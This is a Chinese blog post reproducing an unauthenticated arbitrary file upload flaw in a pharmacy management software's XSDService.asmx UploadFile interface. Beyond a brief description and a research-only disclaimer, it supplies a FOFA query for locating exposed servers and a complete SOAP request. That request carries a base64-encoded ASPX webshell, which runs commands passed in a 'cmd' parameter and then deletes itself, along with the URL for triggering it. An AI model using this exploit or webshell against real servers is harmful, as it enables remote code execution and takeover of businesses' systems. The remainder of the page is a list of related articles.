药业管理软件UploadFile文件上传

最新推荐文章于 2025-06-15 22:58:05 发布
最新推荐文章于 2025-06-15 22:58:05 发布
阅读量253 收藏 4
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 web安全 漏洞复现 网络安全 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/148267572
版权

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

药业管理软件 XSDService.asmx 接口UploadFile实例存在文件上传,未经身份攻击者可在服务器端任意执行代码。

fofa

body="XSDService.asmx"

poc

POST /XSDService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/UploadFile"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <UploadFile xmlns="http://tempuri.org/">
      <filePath>2</filePath>
      <fileName>rce.aspx</fileName>
      <buffer>PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiIHZhbGlkYXRlUmVxdWVzdD0iZmFsc2UiICU+CjwlCnZhciBjPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbygiY21kIik7CnZhciBlPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcygpOwp2YXIgb3V0OlN5c3RlbS5JTy5TdHJlYW1SZWFkZXIsRUk6U3lzdGVtLklPLlN0cmVhbVJlYWRlcjsKYy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7CmMuUmVkaXJlY3RTdGFuZGFyZE91dHB1dD10cnVlOwpjLlJlZGlyZWN0U3RhbmRhcmRFcnJvcj10cnVlOwplLlN0YXJ0SW5mbz1jOwpjLkFyZ3VtZW50cz0iL2MgIiArIFJlcXVlc3QuSXRlbVsiY21kIl07CmUuU3RhcnQoKTsKb3V0PWUuU3RhbmRhcmRPdXRwdXQ7CkVJPWUuU3RhbmRhcmRFcnJvcjsKZS5DbG9zZSgpOwpSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkgKyBFSS5SZWFkVG9FbmQoKSk7ClN5c3RlbS5JTy5GaWxlLkRlbGV0ZShSZXF1ZXN0LlBoeXNpY2FsUGF0aCk7ClJlc3BvbnNlLkVuZCgpOyU+</buffer>
      <Offset>1</Offset>
    </UploadFile>
  </soap:Body>
</soap:Envelope>

文件路径:/Upload2015/2/rce.aspx?cmd=dir

黄药师药业管理软件XSDService.asmx存在任意文件上传漏洞
缘梦未来的博客
12-16 351
黄药师药店管理是专为零售药店打造的管理软件,集综合进销存管理,会员管理,GSP管理等于一身,其直观的界面,简洁的操作,去繁存精,更易使用,助您的事业更进一步。
enjoyscm 供应链管理系统 UploadFile 文件上传漏洞复现
0xSec
12-15 1033
enjoyscm供应链管理系统UploadFile接口处存在任意文件上传漏洞,攻击者可上传恶意木马获取服务器权限。
2024年12月近日漏洞 漏洞情报下载
CZDN_0dayPoz的博客
12-20 859
用友U8 Cloud ReleaseRepMngAction 存在SQL注入漏洞(CNVD-2024-33023)Sitecore CMS 未经身份验证export 任意文件读取漏洞复现(CVE-2024-6781)Cleo文件传输软件Synchronization 存在任意文件读取漏洞(CVE-2024-50623)MitelMiCollab 身份绕过导致任意文件读取漏洞复现(CVE-2024-41713).d。CRMEB save_basics存在任意文件下载漏洞(CVE-2024-52726)
2024年12月近日漏洞 漏洞情报
CZDN_0dayPoz的博客
12-20 1009
用友U8 Cloud ReleaseRepMngAction 存在SQL注入漏洞(CNVD-2024-33023)Sitecore CMS 未经身份验证export 任意文件读取漏洞复现(CVE-2024-6781)Cleo文件传输软件Synchronization 存在任意文件读取漏洞(CVE-2024-50623)MitelMiCollab 身份绕过导致任意文件读取漏洞复现(CVE-2024-41713).d。CRMEB save_basics存在任意文件下载漏洞(CVE-2024-52726)
Springboot+Flask+Neo4j+Vue2+Vuex+Uniapp+Mybatis+Echarts+Swagger+JWT+Nginx+VueRouter综合项目学习笔记【包括项目部署】
qq_51201910的博客
07-15 3048
Neo4j高性能图数据库从入门到实战医学知识图谱问答系统neo4j知识图谱 Vue+flask 中药中医方剂大数据可视化系统ECharts数据可视化项目、D3js数据可视化入门D3.js展示地址:数据可视化子绝父相立即执行函数(function(){})();ECharts官网:Apache ECharts随屏幕自适应变化 拐点 B站pink老师 二选一:速成教程Flask web框架实战爬取网站:http://www.zhongyoo.com/name/数据处理:pandas提取关键字:textrank、
uploadFile文件上传
08-23
在IT行业中,文件上传是一项常见的功能,特别是在网页应用、文件管理系统以及数据共享平台等领域。"uploadFile文件上传" 描述的可能是一个专用于处理文件上传的插件或组件,它简化了开发人员在应用程序中集成文件...
UploadFile.class.php支持多文件上传的上传类
03-31
UploadFile.class.php支持多文件上传的上传类 说明:支持多文件上传的上传类 使用方法: include '../UploadFile.class.php'; $upload=new UploadFile(); if(!$upload->upload()) { // 上传错误提示错误信息 $...
某赛通电子文档安全管理系统 hiddenWatermark/uploadFile 文件上传漏洞复现
0xSec
01-26 1060
某电子文档安全管理系统 hiddenWatermark/uploadFile接口处存在文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
安全生产台账系统
hanwei020502的博客
06-14 267
Trivy离线扫描:容器安全实践指南!
tersky的专栏
06-13 649
Trivy离线扫描:容器安全实践指南!
代码填空题技术实现:突破 highlight.js 安全限制的工程实践
半岛铁盒里
06-11 1244
本文探讨了在交互式代码教育平台中实现代码填空题的技术方案。针对highlight.js过滤HTML标签导致无法直接插入输入框的问题,作者提出了先完成语法高亮再修改DOM的双阶段解决方案。关键技术包括:1) 利用nextTick确保Vue DOM更新;2) 采用MutationObserver监听高亮渲染完成;3) 在渲染后插入受控输入框元素。方案解决了安全性问题,同时优化了用户交互体验,包括输入框索引跟踪和状态保存。特别强调了在处理异步渲染时,MutationObserver比嵌套nextTick更可靠。该
软件测试之简单基础的安全测试方法(另外包含软测面试题库)
qq_39635178的博客
06-14 555
阅读本文前请注意最后编辑时间,文章内容可能与目前最新的技术发展情况相去甚远。欢迎各位评论与私信,指出错误或是进行交流等。
水库大坝安全监测之渗流监测
weixin_48039531的博客
06-12 741
通过在坝体和坝基不同位置埋设测压管或渗压计等仪器,监测不同深度、不同位置的渗流压力,绘制等势线,分析渗流场分布情况,评估大坝防渗效果与渗透稳定性。结合大坝整体安全状况,综合分析渗流监测数据与其他监测项目(如变形监测、应力应变监测等)数据,为大坝维护、加固等决策提供全面、科学的支持,确保水库大坝长期安全稳定运行。通过在坝体或坝基中铺设光纤,利用光纤中光信号与周围环境相互作用产生的变化,如光的强度、相位、频率等,感知渗流场参数,如渗流压力、温度等。对比不同部位的渗流压力分布,评估大坝防渗效果和渗流场的均匀性。
Proof of Talk专访CertiK联创顾荣辉:全周期安全方案护航Web3生态
weixin_58310340的博客
06-11 869
6月10日,CertiK联合创始人兼CEO顾荣辉在Proof of Talk 2025举办期间,接受大会官方专访,分享了他对Web3安全现状的观察以及CertiK的安全战略布局。
菌菇食用攻略:从营养解析到安全指南,解锁科学食菌
2503_90208218的博客
06-11 1231
菌菇食用安全与营养指南 菌菇营养丰富,富含蛋白质、维生素D及抗氧化物质,但食用不当存在风险。安全食用需注意:彻底加热(中心温度达74℃以上)、控制摄入量(成人每日100-150g)、特殊人群谨慎选择(过敏者、孕妇、慢性病患者等)。野生菌中毒事件频发,切勿轻信民间鉴别方法,应选择正规渠道购买。娱乐化传播菌菇中毒危害严重,需加强科学认知。合理食用菌菇需平衡其营养价值与潜在风险,遵循个体化膳食原则。
防御性安全:数字取证
qq_41179365的博客
06-14 806
【代码】防御性安全:数字取证。
MongoDB使用安全的sha256认证
qq_28722667的博客
06-15 192
使用MongoDB 3.2 仅支持默认SCRAM-SHA-1,不够安全需要使用SCRAM-SHA-256,但只有MongoDB4.0才支持。又因为3.2到4.0是大版本升级,云不支持在线升级,所以只能切换数据库做数据同步。
零信任安全技术深度解析:技术架构与最佳实践
最新发布
TechVision大咖圈聚合全球科技大咖,洞察AI、云计算、大数据等前沿趋势,为企业决策者提供智见未来的转型路径。
06-15 482
零信任安全(Zero Trust Security)是一种革命性的网络安全架构理念,其核心思想是”永不信任,持续验证”(Never Trust, Always Verify)。这一理念彻底颠覆了传统的网络安全边界防护模式,认为任何用户、设备或应用程序都不应该被默认信任,无论其位置在网络内部还是外部。
云原生安全实践:CI/CD流水线集成DAST工具
like21a的博客
06-11 1238
通过将 DAST 集成到 CI/CD 流水线,企业可以实现“安全左移”,在开发早期发现并修复漏洞,降低修复成本。结合 SAST、SCA 等工具,并遵循最佳实践,可构建高效、安全的云原生应用交付体系。🚧 您已阅读完全文99%!缺少1%的关键操作:加入「炎码燃料仓」🚀 获得:√ 开源工具红黑榜√ 项目落地避坑指南√ 每周BUG修复进度+1%彩蛋(温馨提示:本工坊不打灰工,只烧脑洞🔥)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值